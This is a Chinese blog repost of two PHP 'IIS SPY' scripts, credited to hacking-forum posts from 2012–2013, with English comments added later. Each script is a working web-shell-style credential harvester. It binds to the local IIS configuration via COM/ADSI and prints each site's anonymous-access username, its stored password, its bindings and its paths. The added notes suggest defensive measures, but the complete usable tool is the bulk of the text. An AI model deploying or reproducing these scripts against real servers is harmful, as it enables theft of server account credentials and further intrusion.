php 版iisspy

作者: admin 分类: 未分类 发布时间: 2016-12-26 20:48

作者:dust2
文章来源:https://www.t00ls.net/viewthread.php?tid=22864
日期:2013-5-16

<?php
// True when the directory separator is a backslash, i.e. the script is running on Windows.
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
// 1 when a class named COM exists (PHP's COM extension is loaded), otherwise 0.
// Defender note: the metabase query further down is gated on this flag, so a web host
// that does not load the COM extension never reaches it.
define('IS_COM', class_exists('COM') ? 1 : 0 );
?>

<html xmlns=http://www.w3.org/1999/xhtml>
<head id=Head1>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta http-equiv="pragma" content="no-cache" />
<title>IIS SPY</title>
<style type="text/css">
BODY,TD{FONT-SIZE: 14px;line-height:20px;}
.tab-content { BORDER-RIGHT: #cccccc 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #cccccc 1px; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; VERTICAL-ALIGN: top; BORDER-LEFT: #cccccc 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff;}
.Soft-content { BORDER-RIGHT: #cccccc 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #cccccc 1px solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; VERTICAL-ALIGN: top; BORDER-LEFT: #cccccc 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff;}
</style>
</head>
<body>
<table cellspacing=1 runat=server cellpadding=1 width=600px align=center border=0>
<tr><td class=Soft-content>
        <div id="frm_main">
<?php
/**
 * Print an error message as a red <pre> block.
 *
 * The message is written into the markup exactly as received, with no HTML escaping.
 * The attribute name `stylr` is reproduced as-is (it looks like a typo for `style`),
 * so the grey background is presumably never applied by a browser.
 *
 * @param mixed $s Message text to display.
 */
function ShowErr($s){
        $prefix = "<pre stylr='background:#d1d1d1;'><font color=red>";
        $suffix = "</font></pre>";
        echo $prefix . $s . $suffix;
}
// Main routine: on Windows with the COM class available, bind to the local IIS
// configuration through the ADSI "IIS://" path, walk its children and print one table
// row per numeric-named child with its anonymous-access account, that account's stored
// password, its bindings and its path. On any other host only an error is shown.
//
// Defender notes:
//  - What is exposed is whatever the identity running PHP is allowed to read from the
//    IIS configuration; the page's own remark is that a host granting this access can
//    usually be made to run commands as well. Review that identity's rights.
//  - Not loading PHP's COM extension on web-facing hosts removes this code path.
//  - A PHP file under a web root that references "IIS://localhost/w3svc" is worth
//    treating as an indicator of compromise; if one is found, rotate the anonymous
//    account passwords of every site on the server.
if(IS_WIN && IS_COM){
        try{
        // Bind to the local web service node; '@' keeps PHP warnings off the page.
        $obj=@new COM("IIS://localhost/w3svc");
        // Table header: ID, anonymous user, anonymous password, bindings, path.
        $ctn="<table class=tab-content width=100% border=0 align=center cellpadding=0 cellspacing=0>
        <tr bgcolor=#0066CC><td>ID:</td><td>IIS_USER:</td><td>IIS_PASS:</td><td>Domain:</td><td>Path:</td></tr>\n";
        $i=0;
        foreach($obj as $obj3w)
        {    
                $i++;
                // Alternate the row background on every second iteration.
                if($i%2==0) $ctn.="<tr>";
                else $ctn.="<tr bgcolor=#F0F8FF>";
                // Only children whose Name is numeric are reported (presumably the
                // per-site nodes; confirm against the IIS version in use).
                // NOTE(review): the <tr> above is already appended and $i already
                // incremented when this skips, so skipped children leave an unclosed
                // row, and the ID column is the loop counter, not the child's Name.
                if(!is_numeric($obj3w->Name)) continue;
                // Open the Root node of this child to read its properties.
                $webSite=new com("IIS://localhost/w3svc/".$obj3w->Name.'/Root');
                // NOTE(review): presumably unreachable where a failed COM bind throws
                // (handled by the catch below); $php_errormsg is only populated when
                // track_errors is enabled, so confirm for the PHP version in use.
                if(!$webSite)
                {        $ctn.="<td>[ERROR]=".$php_errormsg."</td><td></td><td></td><td></td><td></td></tr>\n";
                        continue;
                }
                // Collect every binding of this child, one per line.
                $Binds="";
                foreach($obj3w->ServerBindings as $Binds1)
                {
                        $Binds.=$Binds1."\n";
                }
                // The sensitive reads: anonymous-access account name, its stored
                // password, and the path property of the Root node.
                $user=$webSite->AnonymousUserName;
                $pass=$webSite->AnonymousUserPass;
                $path=$webSite->path;
                // Values are concatenated into the HTML as-is, with no escaping.
                $ctn.="<td >".$i."</td><td >".$user."</td><td >".$pass."</td><td >".$Binds."</td><td >".$path."</td></tr>\n";
        }
        $ctn.="</table>";
        echo $ctn;
        }
        catch(Exception $e){
                // Any exception raised above is shown to the requester verbatim.
                ShowErr($e->getMessage());
        }
}else{
        // Shown when the host is not Windows or the COM class is missing
        // (the message text means "system not supported").
        ShowErr('系统不支持');
}
?>
        </div>
</td></tr>
</table>
</body>
</html>

以下是本人(lostwolf)
日期:2012-7-28 发于 90sec 版本
来源:https://forum.90sec.org/forum.php?mod=viewthread&tid=3212
测试环境:(iis 6.0 ) 非system 无执行命令权限

调用 Windows COM 组件
有这个权限 一般都可以执行命令了…

<?php
// Earlier plain-text variant of the same listing: binds to the local IIS configuration
// through the ADSI "IIS://" path and echoes, for each numeric-named child, its ID,
// comment, state, bindings, anonymous-access account, that account's stored password
// and its path.
// There is no Windows/COM availability check and no try/catch here, so a failed bind
// presumably surfaces as an uncaught error rather than a message (confirm).
//
// Defender notes: what is exposed is whatever the identity running PHP may read from
// the IIS configuration, so review that identity's rights; not loading PHP's COM
// extension on web-facing hosts removes this code path; a PHP file under a web root
// that references "IIS://localhost/w3svc" is worth treating as an indicator of
// compromise, followed by rotation of the anonymous account passwords.
$ObjService = new COM("IIS://localhost/w3svc");

foreach ($ObjService as $obj3w) {

  // Only children whose Name is numeric are reported (presumably the per-site nodes).
  if(is_numeric($obj3w->Name)){

   
      // Open the Root node of this child to read its properties.
      $webSite=new COM("IIS://localhost/w3svc/".$obj3w->Name.'/Root');
      echo "[ID    ] " .$obj3w->Name.'</br>';
      echo "[NAME  ] " .$obj3w->ServerComment.'</br>';
      // ServerState is cast to int and mapped below: 2, 4 and 6 are printed as
      // running, stopped and paused; any other value prints no state line.
      $state=intval($obj3w->ServerState);
      if ($state==2) {
     
          echo "[STATE ] running".'</br>';
      }
     
      if ($state==4) {
     
          echo "[STATE ] stoped".'</br>';
      }

      if ($state==6) {
     
          echo "[STATE ] paused".'</br>';
      }

      // One line per binding of this child.
      foreach ($obj3w->ServerBindings as $Binds){

          echo "[HOST  ] "  .$Binds.'</br>';

      }
      // The sensitive reads: anonymous-access account name, its stored password and
      // the path property. All values are echoed into the page without HTML escaping.
      echo "[USER  ] " . $webSite->AnonymousUserName.'</br>';
      echo "[PASS  ] " . $webSite->AnonymousUserPass.'</br>';
      echo "[PATH  ] " . $webSite->path.'</br>';
      echo "-------------------------------------------".'</br>';

  }
}

?>
